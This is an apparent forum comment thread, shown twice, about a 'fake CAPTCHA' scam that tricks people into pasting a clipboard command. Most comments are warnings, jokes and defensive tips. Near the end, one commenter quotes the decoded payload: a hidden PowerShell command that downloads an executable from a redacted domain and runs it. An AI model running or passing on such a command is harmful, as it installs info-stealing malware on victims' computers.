I pasted the code into a blank tab and it was a prompt to open powershell and connect to a remote web address. Shocker
Mindless__Giraffe
simple directions are the easiest to follow
Default_Defect
This would absolutely work on most people I know.
Odious-Individual
Pretty sure inexperienced people could easily fall for that
In fact, I think it’s pretty clever
Titanium125
I have seen at least 4 posts from people have actually done this.
w1n5t0nM1k3y
Probably a good idea to disable clipboard access from JavaScript in the browser.
SolarJetman5
I watched a YouTube video just a few weeks ago about this captcha, never seen one in the wild tho
zincboymc
I would definitely fall for this, and so would the rest of my family and friends. Even me knowing about it might not save me.
Serious question, am I less at risk if I don’t use an admin account and fall for this ?
Smooth_Finance_1825
Can you paste the command it copies in your clipboard in here?
Fallen_Jalter
If this happened to one of my users I would bring the wrath of IT Gods in there heads so hard their ancestors would feel it.
elBirdnose
This would definitely work if you weren’t tech savvy or just not paying attention
wakaranbito
You may already know that’s a trap and laugh, but i believe most people would fall for this. I kinda feel to be ‘know’ about computers nowadays feels like a blessing.
igotshadowbaned
It works enough times for them to keep doing it
mootpoots
clever
Morall_tach
Ctrl + V for Verify
TheLoneWandererRD
They are aware it’s stupid and you are not their target. A lot of tech illiterates fall for this.
Smith6612
This is one of the reasons why a properly locked down browser blocks access to the clipboard, and sandboxes it only to the tab. Firefox did this YEARS ago, and it got many people upset, because copying/pasting between things like Google Docs and Websites didn’t work without the user having to use the system keyboard shortcuts.
r3negadepanda
This is a slow way to build a botnet
redrocker1988
This is known as “Fake Captcha”. The pasted code ultimately leads to info stealer malware like lumma. Most EDRs that are worth a shit should be able to block these they are pretty easy to detect.
wordflyer
Oh man, a discord I’m a part of got hijacked and they tried to get the whole server to “re-verify their membership” with this.
Phalanx32
This would legitimately work on like 50% of the people I work with. They don’t need to try because people are idiots
yairmon33
Holy Molly! This is extremely dangerous, mother of God… Please teach your loved ones to never do this
HD_600
Holy crap, my aunt’s laptop is about to get sent to the Sun and it’s already been nuked before
AllMyFrendsArePixels
That’s just the thing; they don’t *need* to try. Sure, this won’t work on your or me, but it’ll definitely work on grandma.
Au_Fraser
I’d probably fall for this I’m gonna have to send this to my mum
atomicxblue
I love to watch the videos of “Microsoft support” when they encounter a Linux box. It’s comic gold.
Wooden-Specialist669
I’ve followed the link, which leads to a document that has length.char code in it. When decrypting this, it gives us ascii keys. When we spell it all out, it becomes:
Yesterday I myself encountered this same site, I did some digging, and turns out the the link just downloads something from a dodgy website. The link I don’t think works, but the site still works. If it is the same that I encountered. Can somebody enlighten me more?
anotherbuddy
i fall into it last month, put the code and windows defender pop up happend. They hacked my Instagram account. I take it back days after, nothing else.
29 Comments
I pasted the code into a blank tab and it was a prompt to open powershell and connect to a remote web address. Shocker
simple directions are the easiest to follow
This would absolutely work on most people I know.
Pretty sure inexperienced people could easily fall for that
In fact, I think it’s pretty clever
I have seen at least 4 posts from people have actually done this.
Probably a good idea to disable clipboard access from JavaScript in the browser.
I watched a YouTube video just a few weeks ago about this captcha, never seen one in the wild tho
I would definitely fall for this, and so would the rest of my family and friends. Even me knowing about it might not save me.
Serious question, am I less at risk if I don’t use an admin account and fall for this ?
Can you paste the command it copies in your clipboard in here?
If this happened to one of my users I would bring the wrath of IT Gods in there heads so hard their ancestors would feel it.
This would definitely work if you weren’t tech savvy or just not paying attention
You may already know that’s a trap and laugh, but i believe most people would fall for this. I kinda feel to be ‘know’ about computers nowadays feels like a blessing.
It works enough times for them to keep doing it
clever
Ctrl + V for Verify
They are aware it’s stupid and you are not their target. A lot of tech illiterates fall for this.
This is one of the reasons why a properly locked down browser blocks access to the clipboard, and sandboxes it only to the tab. Firefox did this YEARS ago, and it got many people upset, because copying/pasting between things like Google Docs and Websites didn’t work without the user having to use the system keyboard shortcuts.
This is a slow way to build a botnet
This is known as “Fake Captcha”. The pasted code ultimately leads to info stealer malware like lumma. Most EDRs that are worth a shit should be able to block these they are pretty easy to detect.
Oh man, a discord I’m a part of got hijacked and they tried to get the whole server to “re-verify their membership” with this.
This would legitimately work on like 50% of the people I work with. They don’t need to try because people are idiots
Holy Molly! This is extremely dangerous, mother of God… Please teach your loved ones to never do this
Holy crap, my aunt’s laptop is about to get sent to the Sun and it’s already been nuked before
That’s just the thing; they don’t *need* to try. Sure, this won’t work on your or me, but it’ll definitely work on grandma.
I’d probably fall for this I’m gonna have to send this to my mum
I love to watch the videos of “Microsoft support” when they encounter a Linux box. It’s comic gold.
I’ve followed the link, which leads to a document that has length.char code in it. When decrypting this, it gives us ascii keys. When we spell it all out, it becomes:
& powershell -WindowStyle Hidden -Command { $client = New-Object System.Net.WebClient $client.DownloadFile(“http://[actual-malicious-domain]/payload.exe”, “$env:TEMP\update.exe”) Start-Process “$env:TEMP\update.exe” }
Replaced the actual domain, for obvious reasons
Yesterday I myself encountered this same site, I did some digging, and turns out the the link just downloads something from a dodgy website. The link I don’t think works, but the site still works. If it is the same that I encountered. Can somebody enlighten me more?
i fall into it last month, put the code and windows defender pop up happend. They hacked my Instagram account. I take it back days after, nothing else.